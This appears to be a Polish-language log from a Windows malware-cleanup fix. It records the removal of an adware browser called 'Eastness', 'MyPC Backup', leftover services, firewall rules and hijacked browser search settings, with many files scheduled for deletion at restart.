niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\resources.pak" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness\Application\snapshot_blob.bin" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\Eastness" => Zaplanowany do usunięcia przy restarcie.
"C:\Program Files (x86)\Firefox" => nie znaleziono.
"C:\Program Files (x86)\MIO" => pomyślnie usunięto.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\MyPC Backup\LogicNP.EZShellExtensions.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\MyPC Backup\MPCBContextMenu.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\MyPC Backup\x64\SQLite.Interop.dll" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Program Files (x86)\MyPC Backup" => Zaplanowany do usunięcia przy restarcie.
"C:\Users\Adam\AppData\Roaming\SSMgre" => pomyślnie usunięto.
"C:\Program Files (x86)\BiaoJi" => pomyślnie usunięto.
"C:\ProgramData\Software" => pomyślnie usunięto.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Affiliation Database" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Application Cache\Index" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\data_0" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\data_1" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\data_2" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\data_3" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cache\index" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cookies" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Cookies-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Current Session" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Current Tabs" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\data_reduction_proxy_leveldb\000003.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\data_reduction_proxy_leveldb\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\data_reduction_proxy_leveldb\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\databases\Databases.db" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension Cookies" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension Cookies-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\008113.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\008115.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Extension State\MANIFEST-000410" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Favicons" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Favicons-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\000793.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\000796.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\File System\Origins\MANIFEST-000265" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\001750.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\001752.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\001753.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\Encryption\000003.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\Encryption\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\Encryption\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\Encryption\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GCM Store\MANIFEST-000413" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\data_0" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\data_1" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\data_2" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\data_3" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\GPUCache\index" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\History" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\History-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\ekbmlhopnonkbfompbndcifmljkljhji\000003.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\ekbmlhopnonkbfompbndcifmljkljhji\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\ekbmlhopnonkbfompbndcifmljkljhji\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\ekbmlhopnonkbfompbndcifmljkljhji\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000005.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000234.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000236.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000237.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\nkeimhogjdpnpccoofpliimaahmaaome\000003.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\nkeimhogjdpnpccoofpliimaahmaaome\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\nkeimhogjdpnpccoofpliimaahmaaome\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Extension Settings\nkeimhogjdpnpccoofpliimaahmaaome\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_ekbmlhopnonkbfompbndcifmljkljhji_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_gighmmpiobklfepjocnamgkkbiglidom_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_nkeimhogjdpnpccoofpliimaahmaaome_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_nkeimhogjdpnpccoofpliimaahmaaome_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_forum.programosy.pl_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_forum.programosy.pl_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_nk.pl_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_nk.pl_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_stalowka.pl_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_weszlo.com_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_www.90minut.pl_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_www.dailymotion.com_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\http_www.skokinarciarskie.pl_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_clients5.google.com_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_en.wikipedia.org_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_en.wikipedia.org_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_nk.pl_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_nk.pl_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_notifications.google.com_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_pl.wikipedia.org_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_pl.wikipedia.org_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.facebook.com_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.facebook.com_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.google.pl_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.the-scorpions.com_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.the-scorpions.com_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.youtube.com_0.localstorage" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Local Storage\https_www.youtube.com_0.localstorage-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Login Data" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Login Data-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Managed Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\000003.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Managed Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Managed Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Managed Extension Settings\gighmmpiobklfepjocnamgkkbiglidom\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\data_0" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\data_1" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\data_2" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\data_3" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Media Cache\index" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Network Action Predictor" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Network Action Predictor-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Origin Bound Certs" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Platform Notifications\000003.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Platform Notifications\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Platform Notifications\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Platform Notifications\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\previews_opt_out.db" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\QuotaManager" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\QuotaManager-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\000044.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\000046.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Service Worker\Database\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\032928.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\032931.ldb" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Session Storage\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Shortcuts" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Shortcuts-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Data\SyncData.sqlite3" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Data\SyncData.sqlite3-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\MANIFEST-000001" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Top Sites" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Top Sites-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Visited Links" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Web Data" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\Default\Web Data-journal" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\lockfile" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\pl-PL-3-0.bdic" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\data_0" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\data_1" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\data_2" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\data_3" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness\User Data\ShaderCache\GPUCache\index" => Zaplanowany do usunięcia przy restarcie.
niepowodzenie przy usuwaniu "C:\Users\Adam\AppData\Local\Eastness" => Zaplanowany do usunięcia przy restarcie.
"C:\Program Files (x86)\Elex-tech" => nie znaleziono.
"C:\Users\Adam\AppData\Roaming\Elex-tech" => nie znaleziono.
"C:\Program Files\MK" => pomyślnie usunięto.
"C:\Users\Adam\AppData\Local\3DM" => pomyślnie usunięto.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{45E1A9CB-3A83-405D-A7A1-1467833BDE58} => Wartość pomyślnie usunięto
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0622DF48-9942-4C07-8A38-969F01B16F50} => Wartość pomyślnie usunięto
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4DB7B6EB-50A0-49FE-8C66-D2330DD0CDC4} => Wartość pomyślnie usunięto
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{45E1A9CB-3A83-405D-A7A1-1467833BDE58} => Wartość nie znaleziono.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E32899BB-DB0B-4992-885D-1DE33CD6200D} => Wartość pomyślnie usunięto
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5818BB2E-18C6-4808-9E91-566A6BEE8ED8} => Wartość pomyślnie usunięto
C:\Windows\SysWOW64\22 => pomyślnie przeniesiono
C:\Windows\SysWOW64\11 => pomyślnie przeniesiono
HKLM\System\CurrentControlSet\Services\ALSysIO => klucz pomyślnie usunięto
ALSysIO => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\dbx => klucz pomyślnie usunięto
dbx => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\intaud_WaveExtensible => klucz pomyślnie usunięto
intaud_WaveExtensible => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\iwdbus => klucz pomyślnie usunięto
iwdbus => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\NTIOLib_1_0_C => klucz pomyślnie usunięto
NTIOLib_1_0_C => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\VBoxNetFlt => klucz pomyślnie usunięto
VBoxNetFlt => serwis pomyślnie usunięto
iSafeKrnl => serwis nie znaleziono.
HKLM\System\CurrentControlSet\Services\AppleNotificationsSrv => klucz pomyślnie usunięto
AppleNotificationsSrv => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\mfemms => klucz pomyślnie usunięto
mfemms => serwis pomyślnie usunięto
"C:\ProgramData\Software\Apple\Apps\Notification.dll" => nie znaleziono.
Chrome DefaultSearchURL => pomyślnie usunięto
Chrome DefaultSearchKeyword => pomyślnie usunięto
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Software\MozillaPlugins\@acestream.net/acestreamplugin,version=3.1.6 => klucz pomyślnie usunięto
C:\Users\Adam\AppData\Roaming\ACEStream\player\npace_plugin.dll => nie znaleziono.
Firefox SearchEngineOrder.1 pomyślnie usunięto
Firefox SelectedSearchEngine pomyślnie usunięto
C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default\user.js => pomyślnie przeniesiono
C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default\user.js => nie znaleziono.
Firefox DefaultSearchEngine pomyślnie usunięto
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B164E929-A1B6-4A06-B104-2CD0E90A88FF} => klucz pomyślnie usunięto
HKCR\Wow6432Node\CLSID\{B164E929-A1B6-4A06-B104-2CD0E90A88FF} => klucz nie znaleziono.
